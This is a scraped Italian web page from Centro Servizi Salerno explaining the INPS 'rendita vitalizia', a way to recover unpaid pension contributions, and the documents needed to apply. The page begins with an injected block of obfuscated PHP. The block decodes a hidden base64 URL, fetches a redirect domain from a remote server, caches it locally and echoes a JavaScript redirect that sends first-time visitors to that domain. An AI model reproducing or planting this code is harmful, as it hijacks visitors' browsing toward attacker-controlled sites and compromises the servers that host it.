$ed6fe1d0be6347b8e = "/index/?6871568466678"; $kkk557 = "738dd3a8d3649a9131aafdde64b25464"; $s8c7dd922ad47494f = dirname(__FILE__) . "/" . md5($id6fe1d0be634); $h77e8e1445762ae1a = time(); $dejrif483ol = file_exists($s8c7dd922ad47494f); $deaa082fa57816233 = 0; $d07cc694b9b3fc636 = 0; if ($dejrif483ol) { $deaa082fa57816233 = filemtime($s8c7dd922ad47494f); $d07cc694b9b3fc636 = $h77e8e1445762ae1a - $deaa082fa57816233; $se1260894f59eeae9 = @fopen($s8c7dd922ad47494f, base64_decode('cg==')); $ke4e46deb7f9cc58c = json_decode(base64_decode(fread($se1260894f59eeae9, filesize($s8c7dd922ad47494f))) , 1); fclose($se1260894f59eeae9); } $v634894f9845d8dc65 = 'aHR0cDovL3JvaS10cmFmZmljLmljdS9nZXQucGhwP2Y9anNvbiZrZXk9'; $ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e; if ($d07cc694b9b3fc636 >= 20 || !$dejrif483ol) { $m9b207167e5381c47 = v64547f9857d8dc65($s8c7dd922ad47494f); if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) { $ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e; } } function v64547f9857d8dc65($s8c7dd922ad47494f){ global $v634894f9845d8dc65,$kkk557; if(function_exists('curl_version')){ $kd88fc6edf21ea464 = curl_init(); curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true); curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA==')); curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65).$kkk557); curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10); $mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464); curl_close($kd88fc6edf21ea464); $ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true); if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) { $h0666f0acdeed38d4 = @fopen($s8c7dd922ad47494f, base64_decode('dys=')); @fwrite($h0666f0acdeed38d4, base64_encode($mb4a88417b3d0170d)); @fclose($h0666f0acdeed38d4); return $ke4e46deb7f9cc58c; } }else{ $mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65).$kkk557); $ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true); if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) { $h0666f0acdeed38d4 = @fopen($s8c7dd922ad47494f, base64_decode('dys=')); @fwrite($h0666f0acdeed38d4, base64_encode($mb4a88417b3d0170d)); @fclose($h0666f0acdeed38d4); return $ke4e46deb7f9cc58c; } } return false; } if (!$_COOKIE[base64_decode('YTc3N2Q=') ]) { setcookie(base64_decode('YTc3N2Q=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $ye617ef6974faced4 . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $ye617ef6974faced4 . base64_decode('Ijs8L3NjcmlwdD4='); LA RENDITA VITALIZIA - CENTRO SERVIZI SALERNO
CENTRO SERVIZI SALERNO » LA RENDITA VITALIZIA

LA RENDITA VITALIZIA

LA RENDITA VITALIZIA

 

In caso di “vuoto” contributivo, dovuto ad omissione dei versamenti previdenziali da parte dell’ azienda o datore di lavoro, il lavoratore dipendente deve darne notizia all’Inps affinché l’Istituto provveda al recupero.

Se nel frattempo è intervenuta, la prescrizione il lavoratore può chiedere all’Inps la costituzione di una rendita vitalizia per ottenere l’accredito del periodo di omissione contributiva.

Si tratta di un versamento all’Inps il cui importo è calcolato in relazione all’età, alla retribuzione, al sesso, alla lunghezza del periodo da regolarizzare e all’anzianità contributiva. Una volta pagata la cifra richiesta, sulla propria posizione assicurativa, l’Inps accrediterà il periodo non coperto da contribuzione. Questi contributi sono utili sia per raggiungere il diritto sia per calcolare l’importo della pensione.

Oltre ai lavoratori dipendenti, possono usufruire di questa opportunità anche i familiari collaboratori di artigiani, commercianti e coltivatori diretti.

 

 

 COME SI CALCOLA

Si tratta di un versamento all’Inps il cui importo è calcolato in relazione all’età, alla retribuzione, al sesso, alla lunghezza del periodo da regolarizzare e all’anzianità contributiva. Una volta pagata la cifra richiesta, sulla propria posizione assicurativa, l’Inps accrediterà il periodo non coperto da contribuzione. Questi contributi sono utili sia per raggiungere il diritto alla pensione sia per calcolarne l’importo.

Oltre ai lavoratori dipendenti, possono usufruire di questa opportunità anche i familiari collaboratori di artigiani, commercianti e coltivatori diretti.

 

 

 LA DOMANDA

La domanda deve essere presentata all’Inps (dal lavoratore o dal datore di lavoro o dai loro eredi) direttamente agli uffici competenti per territorio o tramite un Ente di Patronato.

 

 Documenti da allegare:buste paga; libri paga e matricola;  libretti di lavoro;  lettere di assunzione; prove testimoniali (solo in relazione alla durata e alla continuità del rapporto di lavoro).